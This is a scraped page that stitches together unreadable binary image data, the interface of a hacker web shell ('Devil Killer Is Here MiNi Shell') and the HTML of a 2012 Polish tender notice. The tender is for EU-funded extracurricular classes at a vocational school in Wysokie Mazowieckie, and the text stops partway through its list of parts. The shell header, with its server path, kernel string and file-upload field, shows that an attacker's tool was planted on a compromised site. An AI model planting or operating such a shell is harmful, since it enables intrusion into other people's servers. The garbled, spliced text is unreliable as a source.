JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120911/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120911/341536-N-2012.html

<p class="kh_header"><b>Wysokie Mazowieckie: Zorganizowanie i przeprowadzenie dodatkowych zajęć  i kursów pozalekcyjnych ogólnokształcących i  zawodowych  w ramach projektu -Doskonały uczeń- w Zespole Szkół Zawodowych im. Stanisława Staszica w Wysokiem Mazowieckiem, którego organem prowadzącym jest Starostwo Powiatowe w Wysokiem Mazowieckiem.</b><br>
<b>Numer ogłoszenia: 341536 - 2012; data zamieszczenia: 11.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół Zawodowych im. Stanisława Staszica , ul. Jagiellońska 4, 18-200 Wysokie Mazowieckie, woj. podlaskie, tel. 086 275 25 88, faks 086 275 24 36.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zszwysmaz.podlasie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie dodatkowych zajęć  i kursów pozalekcyjnych ogólnokształcących i  zawodowych  w ramach projektu -Doskonały uczeń- w Zespole Szkół Zawodowych im. Stanisława Staszica w Wysokiem Mazowieckiem, którego organem prowadzącym jest Starostwo Powiatowe w Wysokiem Mazowieckiem..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest  zorganizowanie i przeprowadzenie dodatkowych zajęć  i kursów pozalekcyjnych ogólnokształcących i  zawodowych  w ramach projektu- Doskonały uczeń -w Zespole Szkół Zawodowych im. Stanisława Staszica w Wysokiem Mazowieckiem współfinansowanego ze środków UE  w ramach EFS z Działania 9.2. Podniesienie atrakcyjności i jakości szkolnictwa zawodowego POKL 2007-2013. Zamówienie zostało podzielone na 20 części. Wykonawca może złożyć ofertę na dowolną liczbę części zamówienia, pod warunkiem, że jedna osoba prowadząca zajęcia (wskazana przez Wykonawcę) może uczestniczyć w realizacji co najwyżej dwóch części zamówienia. Terminy i miejsce wykonania zamówienia:
a)CZĘŚCI:  1,2,3,4,5,6,7,8,- zajęcia pozalekcyjne ogólnokształcące w godzinach od 14.30 do 16.30 w terminie od 01.10.2012 do 28.02.2013. (harmonogram do ustalenia z Koordynatorem Projektu).
b)CZĘŚCI:  9,10,11,12,13, - zajęcia pozalekcyjne zawodowe w godzinach od 15.30 do 19.30 w dniach od poniedziałku do niedzieli (możliwość organizacji zajęć w weekendy)w terminie od 01.01.2013 do 30.06.2013 ( harmonogram do ustalenia z Koordynatorem Projektu).
c)CZĘŚCI: 14,15,16,17,18,19,20- kursy / szkolenia pozalekcyjne w godzinach od 15.30 do 19.30 w dniach od poniedziałku do niedzieli (możliwość organizacji kursów w weekendy) w terminie od 01.02.2013 do 30.04.2013. (harmonogram do ustalenia z Koordynatorem Projektu).
d)Zakłada się, że jedna godzina zajęć/szkolenia/kursu odpowiada jednej godzinie zegarowej (w tym 15 minut przerwy). 
Konsultacje indywidualne z zakresu doradztwa zawodowego odbywać będą się w godzinach dogodnych dla uczniów jako beneficjentów ostatecznych oraz szkoły po uzgodnieniu z koordynatorem projektu. 
e)miejsce realizacji : siedziba Beneficjenta / lub / siedziba Wykonawcy po uprzednim złożeniu oświadczenia o zapewnieniu transportu, wyżywienia i ewentualnie zakwaterowanie uczestników projektu na koszt Wykonawcy.  
Wykaz zajęć/szkoleń/ kursów objętych przedmiotem zamówienia:
CZĘŚĆ :1	Zajęcia wyrównawcze  z języka polskiego  w technikum dla uczniów z klas II (4gr x 20 h)	2.Zajęcia wyrównawcze  z języka polskiego  w technikum dla uczniów z klas III - IV(4gr x 20 h)3.Zajęcia wyrównawcze  z języka angielskiego w technikum dla uczniów z klas II (4gr x 20 h) 4.Zajęcia wyrównawcze  z języka angielskiego w technikum dla uczniów z klas III -  IV(4gr x 20 h) 5. Zajęcia wyrównawcze  z matematyki w technikum dla uczniów z klas III (4gr x 40 h)	
6. Zajęcia wyrównawcze  z matematyki w technikum dla uczniów z klas III -  IV
7. Warsztaty z pedagogiem  dla uczniów w  technikum dla uczniów z klas II-IV (2gr x 15 h)8. Zajęcia z poradnictwa edukacyjno -zawodowego (indywidualne) w  technikum dla uczniów z klas II-IV (3h x 1ucz.)9. Zajęcia ćwiczeniowe kształcące wiadomości i umiejętności praktyczne: Przeprowadzanie oceny jakości żywności w technikum technologii żywności dla uczniów z klas IIA (1gr.x 30h) 10. Zajęcia ćwiczeniowe kształcące wiadomości i umiejętności praktyczne: Przeprowadzanie oceny jakości żywności w technikum technologii żywności dla uczniów z klas IIB, III i IV(1gr.x 30h)	11.Zajęcia ćwiczeniowe kształcące wiadomości i umiejętności praktyczne: Obsługa gości restauracyjnych i hotelowych w technikum hotelarstwa  dla uczniów z klas II-III (1gr.x 30h)12.Zajęcia ćwiczeniowe kształcące wiadomości i umiejętności praktyczne: Obsługa gości restauracyjnych i hotelowych w technikum hotelarstwa dla uczniów z klas III - IV(1gr.x 30h)13. Zajęcia ćwiczeniowe kształcące wiadomości i umiejętności praktyczne: Przygotowanie podstawowych potraw i napojów w III - IV klasie technikum organizacji usług gastronomicznych (1gr.x 30h)14. Kurs kwalifikacyjny barmański  15.Kurs kwalifikacyjny kelnerski	
16. Szkolenie carving 17.Kurs organizacji przyjęć okolicznościowych 18.Kurs kwalifikacyjny analityka żywności 19.Szkolenie System zapewnienia jakości żywności HACC	20.Szkolenie Gender mainstreaming.		
Wykonawca/y zobowiązuje/ą  się do:
realizacji zadań projektowych zgodnie z zapisami umowy zawartej z Zamawiającym,
 przetwarzania danych osobowych młodzieży biorącej udział w Projekcie zgodnie z obowiązującym prawem, po uzyskaniu zgody IP - Urząd Marszałkowski Województwa Podlaskiego
współpracy z Kadrą Zarządzającą Projektem, udziału w spotkaniach roboczych zespołu projektowego (na wniosek Koordynatora)przekazania  całej dokumentacji przebiegu zajęć koordynatorowi projektu( a w przypadku kursów zawodowych 1 kompletu  do archiwizacji dokumentów związanych z projektem)  w okresie dwóch tygodni po zakończeniu zajęć/kursów, nie później niż w ostatnim dniu trwania umowy, odpracowania  zajęć, które nie odbyły się w terminach określonych w harmonogramie z powodu uzasadnionej nieobecności wszystkich uczniów biorących udział w zajęciach. Zleceniobiorca nie będzie rościł z tego tytułu dodatkowego wynagrodzenia.poddania się kontroli planowej i nieplanowej zarówno ze strony Zleceniodawcy, jak też instytucji zewnętrznych. Informowania i zgłaszania Kadrze Zarządzającej Projektem wszelkich nieprawidłowości, problemów związanych z realizacją niniejszej umowy. dbania, aby w salach, w których odbywają się zajęcia/kursy związane z realizacją przedmiotowego Projektu zawsze znajdowały się materiały promocyjne dotyczące Projektu. Materiały promocyjne zostaną dostarczone przez Koordynatora, zapewnienia dojazdu, noclegów  i dziennego wyżywienia uczestnikom projektu i ich opiekunom w przypadku realizacji zajęć w swojej macierzystej siedzibie poza terenem szkoły (dotyczy części 14,15,16,17,18,19,20) zapewnienia wyżywienia  uczestnikom projektu i ich opiekunom: obiadokolacja  w dni powszednie i całodzienne wyżywienie w przypadku realizacji zajęć w weekendy(dotyczy części 14,15,16,17,18)
 podczas realizacji zajęć w siedzibie Zamawiającego. opracowania i przygotowania testów niezbędnych do sporządzenia Indywidualnego Planu Działania (IPD) - dotyczy Części 8 Opracowanie IPD obejmować będzie proces doradczy (zajęcia indywidualne - część 8), w wyniku którego nastąpi identyfikacja oczekiwań  ucznia i wstępnych celów zawodowych w tym wyboru odpowiedniej ścieżki edukacyjnej, poznanie mocnych i słabych stron ucznia i ich wpływu na dalszą edukację, wyznaczenie celów i ukierunkowanie w podjęciu  decyzji w wyborze  szkoły, przeprowadzenie diagnozy oczekiwań, określenie predyspozycji osobowościowych i zawodowych, ocena postawy w stosunku do przyszłości, rozpoznanie trudności w nauce rzutujących na dalszą edukację, analiza możliwości podnoszenia wiedzy i umiejętności ucznia. przekazania każdemu uczestnikowi niezbędne surowce spożywcze (o ile takowe są potrzebne) oraz opracuje, powieli i dostarczy uczestnikom szkolenia niezbędne materiały szkoleniowe z zakresu tematyki kursu,  do przesłania Zamawiającemu programu szkolenia/kursu oraz materiałów szkoleniowych dotyczących części  : 14,15,16,17,18,19,20 w terminie 5 dni przed terminem rozpoczęcia zajęć celem ich akcepcji,.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 20.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiajacy nie wymaga wnoszenie wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku będzie dokonywana metodą 0 - 1, tj. nie spełnia/spełnia, w oparciu o oświadczenie dołączone do oferty, którego wzór stanowi załącznik nr 1 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku będzie dokonywana metodą 0 - 1, tj. nie spełnia/spełnia, w oparciu o oświadczenie dołączone do oferty, którego wzór stanowi załącznik nr 1 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie uznany za spełniony, jeżeli Wykonawca dysponuje min. jedną osobą (odpowiednio do części zamówienia), posiadającą odpowiednie kwalifikacje i doświadczenie odpowiednie dla danej części zamówienia i określone jako wymogi formalne w poniższej tabeli. 
Ocena spełnienia warunku będzie dokonywana metodą 0 - 1, tj. nie spełnia/spełnia, w oparciu o oświadczenie dołączone do oferty, którego wzór stanowi załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie uznany za spełniony, jeżeli Wykonawca dysponuje min. jedną osobą (odpowiednio do części zamówienia), posiadającą odpowiednie kwalifikacje i doświadczenie odpowiednie dla danej części zamówienia i określone jako wymogi formalne w poniższej tabeli. 
Ocena spełnienia warunku będzie dokonywana metodą 0 - 1, tj. nie spełnia/spełnia, w oparciu o oświadczenie dołączone do oferty, którego wzór stanowi załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku będzie dokonywana metodą 0 - 1, tj. nie spełnia/spełnia, w oparciu o oświadczenie dołączone do oferty, którego wzór stanowi załącznik nr 1 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz ofertowy  - zgodnie z załącznikiem 6 do SIWZ
Pełnomocnictwo wystawione dla osoby składającej ofertę, podpisane przez osobę upoważnioną do reprezentowania Wykonawcy, w przypadku składania oferty przez pełnomocnika
W przypadku składania oferty przez podmioty występujące wspólnie, do oferty musi być dołączony dokument ustanawiający przez Wykonawców chcących startować wspólnie wspólnego pełnomocnika.
W przypadku składania oferty przez podmioty występujące wspólnie oświadczenia o spełnieniu warunków określonych w art. 22 ust.1 ustawy oraz o nie podleganiu wykluczeniu z powodu niespełnienia warunków, o których mowa w art. 24 ust. 1 ustawy oraz dokumenty, o których mowa w pkt 1.2 i 1.3 muszą być złożone przez każdy podmiot. 
Przedsiębiorcy występujący jako spółka cywilna zobowiązani są do załączenia umowy spółki cywilnej, celem  ustalenia osób uprawnionych do reprezentowania spółki.
Oświadczenie że jeżeli Wykonawca zamierza realizować kurs w swojej macierzystej siedzibie poza terenem szkoły, zobowiązuje się do zapewnienia dojazdu i wyżywienia uczestnikom projektu i ich opiekunom, a w przypadku kursów długoterminowych również zapewnienie noclegów na koszt Wykonawcy. (załącznik nr 5 do SIWZ);</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W przypadku zdarzeń losowych oraz szczególnych okoliczności, których nie można było przewidzieć 
w chwili zawarcia umowy, istnieje możliwość wprowadzenia zmian do zawartej umowy w zakresie:
a)zmiany w nazwie, oznaczeniu, siedzibie, numerze konta bankowego Zamawiającego lub Wykonawcy dokonanej w trakcie trwania umowy
b)przesunięcia terminu wykonania przedmiotu zamówienia,
c)zmiany miejsca odbywania zajęć wyrównawczych
d)poprawiania oczywistych omyłek w treści umowy
e)zmiany wymiaru godziny zajęć na wymiar wprowadzany przez przepisy prawa oświatowego w przypadku zmiany przepisów prawa oświatowego w zakresie wymiaru godziny zajęć, Zmiana wymiaru godziny zajęć nie będzie powodowała zmiany wynagrodzenia wskazanego w § 4 ust. 1 umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zszwysmaz.podlasie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Szkół Zawodowych im. Stanisława Staszica w Wysokiem Mazowieckiem, ul. Jagiellońska 4 pokój nr 5, 18-200 Wysokie Mazowieckie..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.09.2012 godzina 10:00, miejsce: Sekretariat Zespołu Szkół Zawodowych im. Stanisława Staszica w Wysokiem Mazowieckiem, ul. Jagiellońska 4 pokój nr 5, 18-200 Wysokie Mazowieckie..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiotowe zamówienie jest realizowane w ramach Projektu -Doskonały uczeń-  finansowanego ze środków Unii Europejskiej w ramach Programu Operacyjnego Kapitał Ludzki na lata 2007-2013 współfinansowanego ze środków Europejskiego Funduszu Społecznego, Priorytet IX Rozwój wykształcenia i kompetencji w regionach, Działanie 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowe..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zajęcia wyrównawcze  z języka polskiego  w  technikum dla uczniów z klas II.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia wyrównawcze  z języka polskiego  w  technikum dla uczniów z klas II (4 x 6-8os x 20 h)
przygotowanie programu zajęć pozalekcyjnych (wyrównawczych) i ich prowadzenie,
 prowadzenie dziennika zajęć i ewidencji osób uczestniczących w zajęciach oraz dokumentacji związanej z realizacją zajęć,
dokonanie diagnozy umiejętności uczniów na początku zajęć i na końcu oraz opracowanie raportu i wniosków (max. 2 strony A4),
 sporządzanie raportu postępu uczniów w formie tabeli  (max. 2 strony A4),.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zajęcia wyrównawcze  z języka polskiego  w III - IV klasie technikum.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia wyrównawcze  z języka polskiego  w III - IV klasie technikum (4 x 8os x20 h)
- przygotowanie programu zajęć pozalekcyjnych (wyrównawczych) i ich prowadzenie,
- prowadzenie dziennika zajęć i ewidencji osób uczestniczących w zajęciach oraz dokumentacji związanej z realizacją zajęć,
- dokonanie diagnozy umiejętności uczniów na początku zajęć i na końcu oraz opracowanie raportu i wniosków (max. 2 strony A4),
- sporządzanie raportu postępu uczniów w formie tabeli  (max. 2 strony A4),.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zajęcia wyrównawcze  z języka angielskiego   w  technikum dla uczniów z klas II.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia wyrównawcze  z języka angielskiego   w  technikum dla uczniów z klas II (4 x 6-8 os x 20 h)
- przygotowanie programu zajęć pozalekcyjnych (wyrównawczych) i ich prowadzenie,
- przeprowadzenie testu kompetencji w celu określenia poziomu komunikacji  się w języku angielskim i sporządzenie raportu z diagnozy
- prowadzenie dziennika zajęć i ewidencji osób uczestniczących w zajęciach oraz dokumentacji związanej z realizacją zajęć,
- dokonanie diagnozy umiejętności uczniów na początku zajęć i na końcu oraz opracowanie raportu i wniosków (max. 2 strony A4),
- sporządzanie raportu postępu uczniów w formie tabeli  (max. 2 strony A4),.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zajęcia wyrównawcze  z języka angielskiego   w technikum dla uczniów z klas III -  IV.</p>
